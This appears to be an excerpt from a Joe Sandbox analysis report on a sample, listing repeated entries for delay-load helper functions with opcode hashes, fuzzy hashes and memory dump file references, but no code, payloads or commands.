API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cfd9ef1385eed80298058fc83dd0cd72251969832cd92666d8e1b37c4175de2b
Instruction ID: 350f8d76f511b809350aa210e6c52221da445448b0e8651335ffd5f874c07634
Opcode Fuzzy Hash: cfd9ef1385eed80298058fc83dd0cd72251969832cd92666d8e1b37c4175de2b
Instruction Fuzzy Hash: 5BB012E165C011BC30059105DE05C3F020CD6C4920320C01FFCCCD8044D8445C090873

Function 0101E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 87e732825f2394e1ed79d66e9fc1b51656e10546ee8bfd1afa14549787987ae7
Instruction ID: 6c37eeca4ba4309e90b94170aad58ba3533d9d5d0c9c81a65c5370fd31139fd4
Opcode Fuzzy Hash: 87e732825f2394e1ed79d66e9fc1b51656e10546ee8bfd1afa14549787987ae7
Instruction Fuzzy Hash: 71A001E66A91627D710A6652AE0AC7F121DCAD5A25320952EFCA9E8488AC8828461873

Function 0101E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e892327258928e5e2adf73823c05c4b1db1ce94f789cbca47699410d95870433
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: e892327258928e5e2adf73823c05c4b1db1ce94f789cbca47699410d95870433
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 51be4cfe6e200d441e2578d64901c947a372e21c6dd3c4612882c5a1e0a7b637
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 51be4cfe6e200d441e2578d64901c947a372e21c6dd3c4612882c5a1e0a7b637
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 83caaa049db07c3f01617ef2dacdd8d2c7746ee5735d2cf6fb280cc8b18ae367
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 83caaa049db07c3f01617ef2dacdd8d2c7746ee5735d2cf6fb280cc8b18ae367
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0a2e4bf9a724199ef004c39e9be412b0bd46616a09eb17419bf2f12cdc86c1fa
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 0a2e4bf9a724199ef004c39e9be412b0bd46616a09eb17419bf2f12cdc86c1fa
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0ac36788fb6949bae5b7582efb04957f4dd97b44810dfb4be52e2cd2da2c207b
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 0ac36788fb6949bae5b7582efb04957f4dd97b44810dfb4be52e2cd2da2c207b
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 44fb098375c0c5ba334f77bbd8a0a03b44304a7d0c22e9a2c20088e55b20671b
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 44fb098375c0c5ba334f77bbd8a0a03b44304a7d0c22e9a2c20088e55b20671b
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0fd600838f9711b585ba1f0e32883f8e723eff053ffe7d04b50367a7a8136ec2
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 0fd600838f9711b585ba1f0e32883f8e723eff053ffe7d04b50367a7a8136ec2
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1eb2c4c79e9c3e2c0c3dac93f0bf829b20b41de8a1a41f41e9a7b005441857e1
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 1eb2c4c79e9c3e2c0c3dac93f0bf829b20b41de8a1a41f41e9a7b005441857e1
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 45c6e2d182267d78bdf7af9f86a15fb3a99585c7fc514e732f3d3f6d89855fe8
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 45c6e2d182267d78bdf7af9f86a15fb3a99585c7fc514e732f3d3f6d89855fe8
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 872f735582d6b4ed508a1fa0931d0746c347efddaaea331264870ef32d5358a0
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 872f735582d6b4ed508a1fa0931d0746c347efddaaea331264870ef32d5358a0
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 041501e421993cbd24492b5ba323471598ffec1963f7d3cb79ab16f3d780a845
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 041501e421993cbd24492b5ba323471598ffec1963f7d3cb79ab16f3d780a845
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E51F

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c25cdcf0b3159602ebda62effb6f14a2bbc333c85f38c0c28afa335b3df1e3d5
Instruction ID: 7611195b5363d596044ea6e6280ccb32252a1cc7716a3774f708a2c409ebd761
Opcode Fuzzy Hash: c25cdcf0b3159602ebda62effb6f14a2bbc333c85f38c0c28afa335b3df1e3d5
Instruction Fuzzy Hash: 87A024C115C0037C31051301DD01C3F110CC5C5D10330441FFCC5C40447C441C010430

Function 0101E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E51F

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e8c931bcaffb5d7f31d46fe1db676df85e6d94d98e66364bea7a697f99d831e5
Instruction ID: 7611195b5363d596044ea6e6280ccb32252a1cc7716a3774f708a2c409ebd761
Opcode Fuzzy Hash: e8c931bcaffb5d7f31d46fe1db676df85e6d94d98e66364bea7a697f99d831e5
Instruction Fuzzy Hash: 87A024C115C0037C31051301DD01C3F110CC5C5D10330441FFCC5C40447C441C010430

Function 0101E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E51F

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 682026b8a93d750a6f76b4eb366f11d3b851e653df1877cd5c78e4b212d55cc0
Instruction ID: 7611195b5363d596044ea6e6280ccb32252a1cc7716a3774f708a2c409ebd761
Opcode Fuzzy Hash: 682026b8a93d750a6f76b4eb366f11d3b851e653df1877cd5c78e4b212d55cc0
Instruction Fuzzy Hash: 87A024C115C0037C31051301DD01C3F110CC5C5D10330441FFCC5C40447C441C010430

Function 0101E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E51F

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b1941d85eb7029311e5374e4454da15176b6e4c6f080adbd8746da362472eebe
Instruction ID: 7611195b5363d596044ea6e6280ccb32252a1cc7716a3774f708a2c409ebd761
Opcode Fuzzy Hash: b1941d85eb7029311e5374e4454da15176b6e4c6f080adbd8746da362472eebe
Instruction Fuzzy Hash: 87A024C115C0037C31051301DD01C3F110CC5C5D10330441FFCC5C40447C441C010430

Function 0101E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E580

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

